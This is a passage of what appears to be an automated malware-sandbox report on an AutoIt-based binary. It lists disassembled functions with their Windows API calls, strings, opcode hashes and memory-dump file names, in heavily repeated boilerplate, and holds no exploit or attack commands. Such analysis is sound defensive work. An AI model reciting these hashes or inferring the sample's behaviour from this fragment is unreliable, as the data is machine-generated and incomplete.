                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3243318325-0
                                                                                        • Opcode ID: a7881d1a5b5aa5879e6b8263bd7afb977772396e4728eb4a30479ee35c9f7a65
                                                                                        • Instruction ID: 99b40e7ea6e161db075e7c8b5ddbeec0d448811898886a4904b1ac11ed560530
                                                                                        • Opcode Fuzzy Hash: a7881d1a5b5aa5879e6b8263bd7afb977772396e4728eb4a30479ee35c9f7a65
                                                                                        • Instruction Fuzzy Hash: D73182B11083419FD300EF50D995AAFBBE8FF95350F50052DF585931E2EB719949CB52
                                                                                        Function 00AAB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB3740: CharUpperBuffW.USER32(?,00B671DC,00000000,?,00000000,00B671DC,?,00AA53A5,?,?,?,?), ref: 00AB375D
                                                                                        • _memmove.LIBCMT ref: 00AAB68A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2819905725-0
                                                                                        • Opcode ID: 5a4bcf5116274a260788e53a1011dfcb88cb994a77ebe3a8d99928ab20e1e15e
                                                                                        • Instruction ID: 7076c2ae83316b8a3cd69dc9795a5f460f7bcaeb9562788911852c050c5e3a42
                                                                                        • Opcode Fuzzy Hash: 5a4bcf5116274a260788e53a1011dfcb88cb994a77ebe3a8d99928ab20e1e15e
                                                                                        • Instruction Fuzzy Hash: AFA27A716083419FDB20CF15C584B6AB7F1BF8A304F14895DE89A8B3A2D771ED45CBA2
                                                                                        Function 00AA94E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38d19f499aaeeedf7473d1fb13dcab8280177ba17731593048b8dd8ba3aaa656
                                                                                        • Instruction ID: 6f2511c5d6e86f5b44e1ad61cbdf30fa29c28f0264b4fe2dc4ba0da0d74f03c6
                                                                                        • Opcode Fuzzy Hash: 38d19f499aaeeedf7473d1fb13dcab8280177ba17731593048b8dd8ba3aaa656
                                                                                        • Instruction Fuzzy Hash: 13229A74E00216DFDB24DF58C480BAFB7B4FF4A300F248169E956AB391E774A985CB91
                                                                                        Function 00AC0E38 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindCloseChangeNotification.KERNEL32 ref: 00AC0ED5
                                                                                        • NtProtectVirtualMemory.NTDLL ref: 00AC0EE7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindMemoryNotificationProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2672061364-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 85ff81d66449049bf7fbfe8e5b2fa3d286c208ab207f9380475e3c879d9ca85f
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 8B31B271A40109DBD718DF58C480E69FBB6FF59300B668AA9E41ACB251EB31EDC1CBC0
                                                                                        Function 00AABC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00AABF57
                                                                                          • Part of subcall function 00AA52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AA52E6
                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00AE36B5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                        • API String ID: 1792118007-922114024
                                                                                        • Opcode ID: 35394a57e658256816c805b38167c4651c8097b9c129193a867dfab33a8f4d6d
                                                                                        • Instruction ID: 65b84ec12cc99dc18072c7579d29c6aee7bc06fa0c47d9e4a16a95f983bc0855
                                                                                        • Opcode Fuzzy Hash: 35394a57e658256816c805b38167c4651c8097b9c129193a867dfab33a8f4d6d
                                                                                        • Instruction Fuzzy Hash: 93C2C071608381DFDB24DF25C994BAEBBE4BF85304F14491DF58A8B2A2CB71E944CB52
                                                                                        Function 00AA33E6 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68windowregistryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AA3444
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00AA346E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA347F
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00AA349C
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA34AC
                                                                                        • LoadIconW.USER32(000000A9), ref: 00AA34C2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA34D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 22b055bd04f5d81e04bf6ae77786015772354a429c6a6ce8e62131e12d717d97
                                                                                        • Instruction ID: 664984c332b4f0bb2b84e14d4035618851a599c1b49ff09a5483720dc146e7da
                                                                                        • Opcode Fuzzy Hash: 22b055bd04f5d81e04bf6ae77786015772354a429c6a6ce8e62131e12d717d97
                                                                                        • Instruction Fuzzy Hash: 56310771854309EFDB419FA4D899BDDBBF4FF09314F20425AE590A72A0DBB91981CF90
                                                                                        Function 00AA3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AA3444
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00AA346E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA347F
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00AA349C
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA34AC
                                                                                        • LoadIconW.USER32(000000A9), ref: 00AA34C2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA34D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 3214061b8bc102a8786cdf900dafc8276c0ebd58b51f35642c09cbd49a8b0f7a
                                                                                        • Instruction ID: 62f96cee969b71b843e4ab3852211f265fa0456b40da9cf1497ab4a31eadcda8
                                                                                        • Opcode Fuzzy Hash: 3214061b8bc102a8786cdf900dafc8276c0ebd58b51f35642c09cbd49a8b0f7a
                                                                                        • Instruction Fuzzy Hash: 3421E3B1964209AFEB00EFA5EC98B9DBBF4FB08704F10411AF510A72A0DBB55944CF91
                                                                                        Function 00AB2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00AB3094), ref: 00AC00ED
                                                                                          • Part of subcall function 00AC08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AB309F), ref: 00AC08E3
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AB30E2
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AF01BA
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AF01FB
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AF0239
                                                                                        • _wcscat.LIBCMT ref: 00AF0292
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                        • API String ID: 2673923337-2727554177
                                                                                        • Opcode ID: a65501b8d72b2ff2661311287f55434eea25e2760ab3ab32430da553fefb230f
                                                                                        • Instruction ID: e71fac5c3326b46f53a263de732b3b9f3692917d9697c111fc765ad1164f59de
                                                                                        • Opcode Fuzzy Hash: a65501b8d72b2ff2661311287f55434eea25e2760ab3ab32430da553fefb230f
                                                                                        • Instruction Fuzzy Hash: C0717C714093059EC714EF65E9A5DABBBE8FF49340F80062EF545831B2EF749948CBA2
                                                                                        Function 00AB514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AB5156
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00AB5165
                                                                                        • LoadIconW.USER32(00000063), ref: 00AB517C
                                                                                        • LoadIconW.USER32(000000A4), ref: 00AB518E
                                                                                        • LoadIconW.USER32(000000A2), ref: 00AB51A0
                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AB51C6
                                                                                        • RegisterClassExW.USER32(?), ref: 00AB521C
                                                                                          • Part of subcall function 00AA3411: GetSysColorBrush.USER32(0000000F), ref: 00AA3444
                                                                                          • Part of subcall function 00AA3411: RegisterClassExW.USER32(00000030), ref: 00AA346E
                                                                                          • Part of subcall function 00AA3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA347F
                                                                                          • Part of subcall function 00AA3411: InitCommonControlsEx.COMCTL32(?), ref: 00AA349C
                                                                                          • Part of subcall function 00AA3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA34AC
                                                                                          • Part of subcall function 00AA3411: LoadIconW.USER32(000000A9), ref: 00AA34C2
                                                                                          • Part of subcall function 00AA3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA34D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: c00b1ad850ecaea4b17cd0e0deeb984380100a550c206ca0fe2f0a9a22bfdc97
                                                                                        • Instruction ID: ece1c338c941392bcdd6fcc5bf95cb1b38b61e4c731e68e894cf7d813c38c560
                                                                                        • Opcode Fuzzy Hash: c00b1ad850ecaea4b17cd0e0deeb984380100a550c206ca0fe2f0a9a22bfdc97
                                                                                        • Instruction Fuzzy Hash: FA213771D94308ABEB109FA4ED29B9D7BB4FB09718F10015AF604A72E1DFFA59508F84
                                                                                        Function 00B15E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 00B15E7E
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00B15EC3
                                                                                        • gethostbyname.WS2_32(?), ref: 00B15ECF
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00B15EDD
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15F4D
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15F63
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B15FD8
                                                                                        • WSACleanup.WSOCK32 ref: 00B15FDE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 807a621d53ef80b97e514dd93b7ad8c92121d9fdac2f50001617b333415b0eda
                                                                                        • Instruction ID: aec489c203163396df0c64f7dd71662f9c6272475ccf2d1859fcf6daf069085d
                                                                                        • Opcode Fuzzy Hash: 807a621d53ef80b97e514dd93b7ad8c92121d9fdac2f50001617b333415b0eda
                                                                                        • Instruction Fuzzy Hash: 1D514931604601DFD720AF24CD89BAEB7E4EF88710F1449A9F995DB2A1DB70E985CB42
                                                                                        Function 00AB4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00AB4E22
                                                                                        • KillTimer.USER32(?,00000001), ref: 00AB4E4C
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AB4E6F
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB4E7A
                                                                                        • CreatePopupMenu.USER32 ref: 00AB4E8E
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00AB4EAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: 6bd58de6c753f99164ccc045ef5525e9c03f95a8c9d60df093f0f7fe3fcc4e16
                                                                                        • Instruction ID: 1e24a33cfe26910c2b97e3da19c29fe0e5ec83bf7e458edb22eda549ba8b55f4
                                                                                        • Opcode Fuzzy Hash: 6bd58de6c753f99164ccc045ef5525e9c03f95a8c9d60df093f0f7fe3fcc4e16
                                                                                        • Instruction Fuzzy Hash: 9A41273125820AABEB256F689C5DBFE36ADFB49300F100115F601932E3DFB9DC109761
                                                                                        Function 00AB56F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AF0C5B
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • _memset.LIBCMT ref: 00AB5787
                                                                                        • _wcscpy.LIBCMT ref: 00AB57DB
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AB57EB
                                                                                        • __swprintf.LIBCMT ref: 00AF0CD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                        • String ID: Line %d: $AutoIt - $
                                                                                        • API String ID: 230667853-1796863236
                                                                                        • Opcode ID: 98b2bad0aa554a3b8455ea67b8a10c40bf7ed755b5a711db93d6033318254c8e
                                                                                        • Instruction ID: ea068c8ff9c26e0fcb618bb967b23c95d8bafabe21168b385a046fe64cc3978d
                                                                                        • Opcode Fuzzy Hash: 98b2bad0aa554a3b8455ea67b8a10c40bf7ed755b5a711db93d6033318254c8e
                                                                                        • Instruction Fuzzy Hash: E041B071508304AAD321EB60DDA5FEF77ECAF45354F500A1EF185920A3EF74A649CB92
                                                                                        Function 00AB50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB5109
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB512A
                                                                                        • ShowWindow.USER32(00000000), ref: 00AB513E
                                                                                        • ShowWindow.USER32(00000000), ref: 00AB5147
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: a4b891ccd5c5ec262f5fcaa97b088ceff1781639cde8390e04f541d1c2e4408e
                                                                                        • Instruction ID: 2fdeb9fe4b48e853941f35d7e29de9eac4fde6663c6193996ff605eec615dfe2
                                                                                        • Opcode Fuzzy Hash: a4b891ccd5c5ec262f5fcaa97b088ceff1781639cde8390e04f541d1c2e4408e
                                                                                        • Instruction Fuzzy Hash: 8CF0DA71595294BEEA312B276C69E273E7DDBC7F54F11011AF900A31B0CEA91851DEB0
                                                                                        Function 00B09B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB4A8C: _fseek.LIBCMT ref: 00AB4AA4
                                                                                          • Part of subcall function 00B09CF1: _wcscmp.LIBCMT ref: 00B09DE1
                                                                                          • Part of subcall function 00B09CF1: _wcscmp.LIBCMT ref: 00B09DF4
                                                                                        • _free.LIBCMT ref: 00B09C5F
                                                                                        • _free.LIBCMT ref: 00B09C66
                                                                                        • _free.LIBCMT ref: 00B09CD1
                                                                                          • Part of subcall function 00AC2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9C54,00000000,00AC8D5D,00AC59C3), ref: 00AC2F99
                                                                                          • Part of subcall function 00AC2F85: GetLastError.KERNEL32(00000000,?,00AC9C54,00000000,00AC8D5D,00AC59C3), ref: 00AC2FAB
                                                                                        • _free.LIBCMT ref: 00B09CD9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
